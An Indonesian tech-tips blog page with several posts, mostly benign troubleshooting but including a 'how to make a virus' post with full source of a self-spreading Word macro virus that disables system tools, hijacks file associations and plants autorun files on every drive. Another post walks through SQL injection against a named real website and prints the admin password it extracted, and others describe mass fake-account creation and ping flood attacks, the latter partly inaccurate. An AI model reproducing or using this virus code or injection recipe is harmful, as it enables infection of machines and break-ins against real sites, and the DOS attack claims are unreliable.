Cari Blog Ini

Rabu, 31 Juli 2013

Cara Mengatasi Virus Shortcut Beautiful Girl annie.sys


aNto-Go - Beberapa hari yang lalu kompie kesayangan ane terkena virus yang sedang naik daun yaitu Virus annie.sys. Virus ini menghidden file-file word.doc menjadi word.jse. Mematikan fungsi dari tools Windows seperti TaskManager, Registry, Computer Management, Tools Option dan lainnya. Dan yang paling menjengkelkan virus ini mem-copy diri menjadi sebuah shotcut beautiful_girl_part 1 sampai part 5 serta membuat file dokument menjadi file ber-ekstensi *.jse dengan ukuran file berkisar 9KB.

About Virus:
Nama : annie.ani
Ukuran : 9,201 bytes
Info : Java Script Encoded File

Companion atau File yang dibuat
Serviks-JS dalam aksinya membuat file sebagai berikut:
 1. Autorun.inf

berada pada root drive dan C:\Documents and Settings\%username%\Local Settings\Application Data\Microsoft\CD Burning.

ketika drive dibuka, maka file autorun.inf akan menjalankan file annie.ani, berikut listing file autorun.inf tersebut.

[autorun]
shellexecute=wscript.exe //e:jscript.encode annie.ani /a
shell\open\command=wscript.exe //e:jscript.encode annie.ani /a
shell\explore\command=wscript.exe //e:jscript.encode annie.ani /a

2.  Beautiful_girl_part_1  s/d part_5

ketika user menjalankan file shortcut tersebut yang sepintas terlihat seperti file Video maka akan menjalankan file windows media player atau wmplayer dan  annie.ani

C:\WINDOWS\system32\wscript.exe //e:jscript.encode annie.ani /q:5

3. Annie.sys

berada pada direktori C:\WINDOWS\system32\drivers, file ini akan aktif ketika komputer di restart dengan membuat startup pada registry sebagai berikut :

HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Winlogon value=Userinit=C:\WINDOWS\system32\userinit.exe,wscript.exe //e:jscript.encode C:\WINDOWS\system32\drivers\annie.sys /e

4. Annie.ani

berada pada root drive dan C:\Documents and Settings\%username%\Local Settings\Application Data\Microsoft\CD Burning. File annie.ani selain di aktifkan oleh file autorun.inf dan shortcut, juga aktif ketika user membuka drive dengan memanfaatkan registry.

Dan setelah bertapa dengan eyang gugle selama beberapa malam akhirnya dapat wangsit juga dan hasilnya habis semua virus tersebut.

cara membuat IDS Twitter sendiri

Twitter Bot - Twitter Robot
1. Saya sarankan anda menggunakan Browser Google Chrome untuk melakukan cara ini, karena saya nilai untuk membuat akun twitter dengan browser ini relatif lebih cepat dari pada browser-browser lainnya.
2. Buka situs https://mobile.twitter.com/signup
3. Berikut bagian-bagian kolom yang perlu diisi:
  •  Pada bagian Nama Lengkap : Diisikan dengan nama lengkap yang anda inginkan asal juga tidak apa-apa
  •  Pada Nomor Telepon/ Alamat Email : Diisikan dengan alamat email anda. “Agar Membuat Account Twitter ini lebih cepat saya member Tips&Trick dengan memasukan alamat email asal saja missal : kuroshiwo@Binushacker.net”
  • Pada kata sandi : Diikan dengan kata sandi yang anda inginkan saya sarankan anda membuat kata sandi yang gampang dan mudah diingat agar proses pembuatan akun twitter ini akan lebih cepat
4.  Klik Daftar Ke Twitter
5.  Agar proses pendaftaran lebih cepat pada saat proses loading untuk membuat akun twitter tekan tombol ESC untuk memberhentikan proses loading dan kembali menekan tombol Enter untuk melanjutkan proses loading.
6. Klik pada Icon Profil / Saya
7. Lalu Scrooll kebawah pilih Sign Out/ Keluar
8. Untuk membuat akun twitter lagi ulangi cara tersebut sampai berulang-ulang kali.
9. Selesai gampang kan sekarang anda tidak perlu lagi menunggu dan menulusuri  ke blog-blog hanya untuk mendapatkan IDS Twitter tapi sekarang anda sudah bisa membuatnya.

tes kabel lan tanpa lan tester

Kali ini saya share software bernama Realtek Ethernet Diagnostic Utility, tool ini dapat Anda gunakan untuk menguji kualitas dari LAN Card dan Kable LAN. Dengan software ini Anda tidak perlu lagi mengeluarkan biaya tambahan untuk membeli alat yang dinamakan LAN Tester“.
Cara penggunaanya mudah, tinggal install saja lalu pilih LAN Card yang akan diuji dan jenis test, ada test diagnostic, send and receive, serta pengkabelan, apakah baik atau tidak.
Gambar Kabel Lan Patch Straight dan Cross
Yang akan saya bahas kali ini adalah test pengkabelan karena test ini paling sering digunakan oleh ahli jaringan seperti saya, masih sama seperti tadi, pilih LAN Card, jenis test adalah ”Cable”, dapat dilihat Link Speednya (tergantung dari jenis LAN Card apakah Ethernet biasa atau Gigabit Ethernet) bila berbeda dari yang seharusnya, maka terjadi kesalahan dalam setting jaringan.

Lihat pula pada pair, length, dan status. Pair menunjukkan koneksi dari tiap susuan kabel (tergantung jenis pengkabelan, crossover, straightover, atau loopback), pada gambar di atas, saya menggunakan kabel loopback, jadi yang akan digunakan adalah kabel nomor 1-2 dan 3-6, length menunjukkan panjang kabel dalam satuan meter, status menunjukkan status pengkabelan saat ini, bila normal berarti kabel telah terhubung, open berarti kabel rusak atau putus, dll.

cara membuat virus

  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.


Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, aku dah siapkan kok sourcenya. Makan neh source code!
‘This is my code’s virus
‘Macro Viruses
‘[Macroid]
‘Hanya untuk pembelajaran
Private Sub Document_Close()
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
If Dir(Environ$(“windir”) & “\Macroid.doc”) = “” Then
Dim isicrita As String
isicrita = “[Macroid] by Morphic” & vbCrLf & “Copyright(c) Medan Juli-2008″ & vbCrLf & vbCrLf & _
Chr(34) & “Ms.Word is a thing that can be used as a power to break everything…. ” & Chr(34) & vbCrLf & “(Morphic)”
Open Environ$(“windir”) & “\Macroid.doc” For Output As #1
Print #1, isicrita
Close #1
End If
If Dir(Environ$(“windir”) & “\avmc.vbs”) = “” Then
Open Environ$(“windir”) & “\avmc.vbs” For Output As #1
Print #1, “set fs = createobject(” & Chr(34) & “Scripting.FileSystemObject” & Chr(34) & “)”
Print #1, “for each FD in fs.drives”
Print #1, “if (FD.Drivetype = 1) and FD.Path <> ” & Chr(34) & “A:” & Chr(34) & ” then”
Print #1, “set tf = fs.CreateTextFile(FD.Path” & Chr(38) & Chr(34) & “\Jangan di baca.doc” & Chr(34) & “)”
Print #1, “end if”
Print #1, “Next”
Close #1
End If
ActiveDocument.Save
NormalTemplate.Save
End Sub
Private Sub Document_Open()
CommandBars(“Tools”).Controls(“Macro”).Visible = False
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
CommandBars(“Tools”).Controls(“Customize…”).Visible = False
CommandBars(“Tools”).Controls(“Options…”).Visible = False
Dim AD, NT As Object
Dim isi As String
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If AD.Name <> “Macroid” Then
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
AD.Name = “Macroid”
isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)
AD.CodeModule.AddFromString isi
ActiveDocument.Save
End If
If NT.Name <> “Macroid” Then
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
NT.Name = “Macroid”
isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)
NT.CodeModule.AddFromString isi
NormalTemplate.Save
End If
If InStr(ActiveDocument.Content, “Macroid”) = 0 Then
ActiveDocument.Content = “[Macroid]” & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & “[Macroid] by Morphic” & vbCrLf & “copyright(c) Medan Juli-2008″
End If
On Error Resume Next
Dim b As Object
Set b = CreateObject(“Wscript.Shell”)
b.regwrite “HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title”, “Browser Internet ini diambil alih oleh Macroid”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Macroid”
b.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”, “VM-Morphic”
b.regwrite “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Macroid-A. Eat this!!! Ha ha ha”
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “2″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”
b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”
b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”
b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”
b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”
On Error Resume Next
Dim rog As Integer
Dim atr, vbs, Tipu(10), Trik(10) As String
For a = 66 To 90
partisi = Chr$(a)
vbs = partisi & “:\auto.vbs”
atr = partisi & “:\autorun.inf”
Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”
Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”
Tipu(3) = partisi & “:\Titip File sebentar.doc”
Tipu(4) = partisi & “:\jangan di baca.doc”
Tipu(5) = partisi & “:\buku harian.doc”
Tipu(6) = partisi & “:\cerita hangat.doc”
Tipu(7) = partisi & “:\Punya Baim.doc”
Tipu(8) = partisi & “:\Teka-teki yang baru.doc”
Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”
Tipu(10) = partisi & “:\Trik Sulap.doc”
If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then
Randomize
rog = Int(10 * Rnd) + 1
Open Tipu(rog) For Output As #1
Print #1, “”
Close #1
End If
Trik(1) = partisi & “:\Novel J.K.Rowling.doc”
Trik(2) = partisi & “:\cerita cinta.doc”
Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”
Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”
Trik(5) = partisi & “:\Kumpulan Cheat game.doc”
Trik(6) = partisi & “:\Cheat game RF.doc”
Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”
Trik(8) = partisi & “:\Goosebumps.doc”
Trik(9) = partisi & “:\FearStreet.doc”
Trik(10) = partisi & “:\R.L.Stine.doc”
If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then
Randomize
rogi = Int(10 * Rnd) + 1
Open Trik(rogi) For Output As #1
Print #1, “”
Close #1
End If
Open atr For Output As #1
Print #1, “[Autorun]“
Print #1, “shell\Open\command=wscript.exe auto.vbs”
Close #1
SetAttr atr, vbHidden + vbSystem
Open vbs For Output As #1
Print #1, “dim a”
Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)
Close #1
SetAttr vbs, vbHidden + vbSystem
Next a
End Sub

Trick SQL Injection melalui Script.

Sebuah trik untuk masuk ke keamanan suatu web yaitu dengan cara membobol password administrator langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=
dari sekian banyak hasil pencarian silahkan pilih salah satu contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096
setelah cate_id= di hapus saja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

hasilnya menjadi seperti dibawah ini :

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

Password langsung keluar kan..?
turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

silahkan nikmati hasilnya :D

Selasa, 30 Juli 2013

Mengatasi Komputer yang Tidak Bisa Booting

Salah satu kerusakan komputer yang sering ditemukan adalah permasalahan komputer yang tidak bisa booting.   Disini ada beberapa kasus yang bisa terjadi, diantaranya: komputer tidak bisa booting dengan menampilkan pesan error , komputer booting, namun kemudian muncul bluescreen dan komputer booting, namun kemudian merestart lagi.
 
Untuk permasalahan komputer yang setelah booting muncul tampilan bluescreen, saya telah membahasnya dalam postingan tentang cara memperbaiki komputer bluescreen. Begitu juga dengan penyebab dan cara memperbaiki komputer yang sering restart dan memperbaiki komputer sering hang telah saya uraikan dalam postingan beberapa waktu yag lalu. Sedangkan untuk komputer yang tidak bisa booting sama sekali, disini ada beberapa penyebab yang bisa terjadi, diantaranya:


1. Komputer tidak bisa booting karena Hardisk tidak terdeteksi
Hal ini biasanya ditandai dengan munculnya pesan Disk Boot failure. Untuk mengatasi masalah ini, kita bisa melakukan beberapa hal diataranya:
•    mengecek kondisi kabel IDE atau SATA pada Hardisk, pastikan sudah terpasang dengan benar.
•    untuk 2 hardisk IDE yang terpasang pada 1 kabel, cek posisi jumper untuk setingan Master dan Slavenya supaya jangan tertukar.
•    cek apakah Hardisk sudah terdeteksi oleh BIOS atau belum, coba di-detect satu persatu. Kalau sama BIOS aja ga terdeteksi berarti masalahnya ada pada hardisk tersebut.
•    coba pegang permukaan hardisk, untuk hardisk yang hidup akan terasa getarannya.

2. Komputer tidak bisa booting karena permasalahan Memori dan VGA Card.
Biasanya ditandai dengan terdengarnya bunyi beep yang berulang-ulang, dan tampilan monitor yang tidak mau ngangat. Untuk mengeceknya :
•    coba lepas dulu Memory atau VGA Card, pin-nya dibersihkan dan dipasangkan kembali dengan benar.
•    coba pasang memory di slot yang lain.
•    untuk memory yang lebih dari satu, copot aja dulu yang lainnya dan dites satu persatu.
•    kalau masing terdengar bunyi beep, coba ganti aja dulu Memori atau VGA Cardnya.

3. Komputer yang tidak mau booting karena Processor kepanasan.
Masalah Processor yang overheat bisa menyebabkan komputer sering hang, komputer restart sendiri bahkan komputer ga mau booting.
•    Coba dicek kondisi Heatsink dan fan Processor
•    Lihat juga suhu Processor pada Hardware Monitor di BIOS.

4. Komputer tidak bisa booting karena hardisk atau sistem Windows yang corupt.
Hal ini bisa dilihat dari pesan yang menunjukkan adanya file yang rusak atau hilang. Untuk mengatasinya:
•    Coba dicek dulu kondisi Memory, kalau terpasang lebih dari satu dan tidak kompatibel, biasanya muncul error sistem windows corupt, jadi lepaskan dulu memory yang tidak sejenis.
•    Repair Hardisk seperti telah saya jelaskan dalam artikel cara memperbaiki hardisk
•    Repair Windows  atau install ulang sistem Windows komputer Anda.

Mungkin itulah beberapa penyebab komputer tidak bisa booting dan cara pengecekan dan perbaikannya. Untuk mendiagnosa dan memperbaiki komputer tidak bisa booting tersebut kita juga bisa menggunakan CD UBCD for Windows atau Hiren's Boot  CD. Good luc

Trick Membuka File Linux di Windows

 
Mungkin kalian masih belum percaya bagaimana kita bisa mengakses file sistem linux dengan gampang di windows (read/write). Itu sebenarnya gampang saja, yang perlu kita lakukan hanya mendownload driver yang diperlukan dan install ke windows kita.
berikut ini link website nya: http://www.fs-driver.org/index.html
dan untuk mendownload driver yang diperlukan: http://www.fs-driver.org/download/Ext2IFS_1_10a.exe
Install driver ini ke windows, kemudian anda sudah bisa membaca tulis file sistem linux anda. sudah saya coba dan berhasil dengan baik dan silahkan surfing dengan file-file linux.

Belajar Hack Melalui DOS

Microsoft DOS atau lebih dikenal dengan MS Dos dibekali dengan beberapa hacking tool tersembunyi yang akan kita jabarkan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini kita akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP


Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat
dibawah ini adalah cara penggunaannya

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yang mengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



Jadi kita dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka kita mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">
Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">
Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">
Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada kita  bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com”

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms



Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
